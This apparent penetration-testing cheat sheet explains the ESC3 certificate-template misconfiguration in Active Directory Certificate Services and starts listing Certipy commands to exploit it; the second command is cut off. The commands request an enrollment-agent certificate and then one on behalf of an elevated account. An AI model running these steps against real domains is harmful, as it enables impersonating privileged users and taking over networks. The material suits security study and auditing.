ESC3

TL;DR

ESC3 allows you to request a certificate that can be used to request another certificate on behalf of any user and use that certificate for client authentication using Kerberos.

A template is vulnerable to ESC3 when a certificate template defines the Certificate Request Agent EKU that allows for requesting other certificate templates on behalf of other principals.

A certificate template with the following configuration is vulnerable to ESC3:

• The Enterprise CA allows low-privileged users enrollment rights.

• Manager approval is disabled.

• No authorized signatures are required.

• An overly permissive certificate template security descriptor allows certificate enrollment rights to low-privileged users.

• The certificate template defines the Certificate Request Agent EKU.

Exploit

Certipy.py

Certify.exe

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Linux (Attacker)

Copy

# Request a certificate using a domain account
certipy req -username [username]@[domain] -password [password] -ca [CA CN] -target [CA FQDN] -template [vuln template]

# Request a certificate using the .pfx output from above command with -on-behalf-of an elevated account
certipy req -u